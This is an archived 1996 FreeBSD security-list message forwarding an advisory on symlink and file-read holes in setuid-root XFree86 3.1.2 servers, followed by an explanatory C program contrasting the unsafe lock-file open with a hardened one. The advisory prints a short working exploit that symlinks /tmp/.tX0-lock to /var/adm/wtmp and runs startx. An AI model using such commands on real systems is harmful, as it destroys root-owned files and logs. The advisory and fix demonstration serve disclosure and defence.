From owner-freebsd-security Mon Jan 29 11:45:06 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA25550 for security-outgoing; Mon, 29 Jan 1996 11:45:06 -0800 (PST)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id LAA25510 for ; Mon, 29 Jan 1996 11:44:45 -0800 (PST)
Received: from localhost (localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.7.3/8.6.10) with SMTP id LAA11338 for freebsd-security@freebsd.org; Mon, 29 Jan 1996 11:44:35 -0800 (PST)
From: Cy Schubert - BCSC Open Systems Group
Message-Id: <199601291944.LAA11338@passer.osg.gov.bc.ca>
X-Authentication-Warning: passer.osg.gov.bc.ca: Host localhost [127.0.0.1] didn't use HELO protocol
Reply-to: cschuber@orca.gov.bc.ca
X-Mailer: DXmail
To: freebsd-security@freebsd.org
Subject: XFree86 3.1.2 Security Problems
Date: Mon, 29 Jan 96 11:44:35 -0800
X-Mts: smtp
Sender: owner-security@freebsd.org
Precedence: bulk

I just received this from another security news group. I haven't had a chance to verify this under FreeBSD (at home), however I have no reason to believe that this wouldn't affect FreeBSD as well. Would anyone be willing to comment on this?

Regards,                      Phone:    (604)389-3827
Cy Schubert                   OV/VM:    BCSC02(CSCHUBER)
Open Systems Support          BITNET:   CSCHUBER@BCSC02.BITNET
BC Systems Corp.              Internet: cschuber@uumail.gov.bc.ca
                                        cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."

------- Forwarded Message

There are security holes in XFree86 3.1.2, which installs its servers as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files, it does not take proper precautions to ensure that file permissions are maintained, resulting in the ability to overwrite files, and to read limited portions of other files.

The first problem stems from the server opening a temporary file, /tmp/.tX0-lock, with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this file a symlink, the server will overwrite the original file, and then write its current pid to it.

Other problems exist in the server relating to similar issues; one such example is the ability to specify an arbitrary file as the XF86Config file, which will then be opened, and the first line that fails to match the expected format will be output with an error, allowing a line to be read from an arbitrary file.

Program:                    XFree86 3.1.2 servers
Affected Operating Systems: All systems with XFree86 3.1.2 installed
Requirements:               account on system
Temporary Patch:            chmod o-x /usr/X11R6/bin/XF86*
Security Compromise:        overwrite arbitrary files
Author:                     Dave M. (davem@cmu.edu)
Synopsis:                   While running suid root, XFree86 servers do not properly check file permissions, allowing a user to overwrite arbitrary files on a system.

Exploit:

$ ls -l /var/adm/wtmp
-rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
$ ln -s /var/adm/wtmp /tmp/.tX0-lock
$ startx
(At this point exit X if it started, or else ignore any error messages)
$ ls -l /var/adm/wtmp
-r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp

/-------------\
|David Meltzer|
|davem@cmu.edu|
/--------------------------\
|School of Computer Science|
|Carnegie Mellon University|
\--------------------------/

------- End of Forwarded Message
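The lock-file problem in the forwarded advisory is the classic symlink-following temp file: a privileged process does open(path, O_WRONLY|O_CREAT|O_TRUNC) on a name in a world-writable directory, an unprivileged user pre-creates that name as a symlink, and the truncate plus pid write lands on whatever the link points at. The following C program is an added example, not code from XFree86 or from the advisory's author; it reproduces the unsafe open beside a hardened opener (O_CREAT|O_EXCL|O_NOFOLLOW, which refuses to traverse a planted link) inside a private temp directory, using a constructed stand-in file for /var/adm/wtmp. The directory name, file names and sample content are the example's own choices; it runs as an ordinary user, so the only thing it "overwrites" is its own scratch file, but the system-call behaviour is what a setuid server would exhibit.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed stand-in for the victim file (the advisory used /var/adm/wtmp). */
static const char SAMPLE_CONTENT[] =
    "constructed stand-in for /var/adm/wtmp: not real login records\n";

/* The pattern the advisory describes: open() follows a symlink at 'path',
   O_TRUNC empties the target, and the caller then writes its pid into it. */
int unsafe_lock_open(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened opener (an assumed modern fix, not what XFree86 3.1.2 did):
   O_EXCL fails if anything already exists at 'path', including a symlink,
   and O_NOFOLLOW refuses to traverse a link at the final component.
   Returns -1 with errno set when it refuses. */
int safe_lock_open(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    struct stat st;                       /* belt and braces: what did we open? */
    if (fstat(fd, &st) != 0) { int s = errno; close(fd); errno = s; return -1; }
    if (!S_ISREG(st.st_mode)) { close(fd); errno = EPERM; return -1; }
    return fd;
}

/* Write the pid the way a lock file does: "%10ld\n" is 11 bytes, which is
   exactly the size the advisory's ls shows for the clobbered wtmp. */
int write_pid(int fd)
{
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%10ld\n", (long)getpid());
    if (n < 0 || write(fd, buf, (size_t)n) != n)
        return -1;
    return 0;
}

long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

static int write_sample(const char *path)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(SAMPLE_CONTENT, f);
    return fclose(f);
}

struct demo_result {
    long size_before;        /* victim size before the attack                  */
    long size_after_unsafe;  /* victim size after unsafe_lock_open via symlink */
    int  safe_rc;            /* safe_lock_open on the same symlink (-1)        */
    int  safe_errno;         /* errno it reported                              */
    long size_after_safe;    /* victim size after the refused open             */
    long safe_fresh_size;    /* bytes written by safe_lock_open on a clean path */
};

/* Builds victim + symlink in a fresh temp dir, runs both openers, cleans up.
   Returns 1 when the scenario could be set up, 0 on a setup failure. */
int run_demo(struct demo_result *r)
{
    char dir[] = "/tmp/xf86lock.XXXXXX";          /* example's own scratch dir */
    if (mkdtemp(dir) == NULL) return 0;
    char victim[256], link[256], fresh[256];
    snprintf(victim, sizeof victim, "%s/wtmp", dir);
    snprintf(link, sizeof link, "%s/.tX0-lock", dir);
    snprintf(fresh, sizeof fresh, "%s/.tX1-lock", dir);
    memset(r, 0, sizeof *r);

    if (write_sample(victim) != 0) return 0;
    r->size_before = file_size(victim);
    if (symlink(victim, link) != 0) return 0;     /* the attacker's ln -s */

    /* 1. the server's pattern: the link is followed and the victim truncated */
    int fd = unsafe_lock_open(link);
    if (fd >= 0) { write_pid(fd); close(fd); }
    r->size_after_unsafe = file_size(victim);

    /* 2. restore the victim, then try the hardened opener on the same link */
    if (write_sample(victim) != 0) return 0;
    r->safe_rc = safe_lock_open(link);
    r->safe_errno = errno;
    if (r->safe_rc >= 0) close(r->safe_rc);
    r->size_after_safe = file_size(victim);

    /* 3. the hardened opener on a name nobody has planted anything at */
    fd = safe_lock_open(fresh);
    if (fd >= 0) { write_pid(fd); close(fd); }
    r->safe_fresh_size = file_size(fresh);

    unlink(link); unlink(victim); unlink(fresh); rmdir(dir);
    return 1;
}

int main(void)
{
    struct demo_result r;
    if (!run_demo(&r)) { perror("demo setup"); return 1; }
    printf("victim before: %ld bytes\n", r.size_before);
    printf("after O_WRONLY|O_CREAT|O_TRUNC through the symlink: %ld bytes\n",
           r.size_after_unsafe);
    printf("hardened open on the symlink: rc=%d (%s), victim still %ld bytes\n",
           r.safe_rc, strerror(r.safe_errno), r.size_after_safe);
    printf("hardened open on a fresh path wrote %ld bytes\n", r.safe_fresh_size);
    return 0;
}
```

Two caveats a practitioner would add. O_EXCL|O_NOFOLLOW only closes the door on the open itself; a stale lock file left by a crashed server still has to be handled, and the safe way is to unlink it and retry the exclusive create rather than to truncate it in place. More fundamentally, the advisory's real lesson is that a setuid root server should not be touching user-controllable paths with root privileges at all: the permanent fix is to drop to the real uid before any such file operation, with the o-x workaround in the advisory as the stop-gap until then.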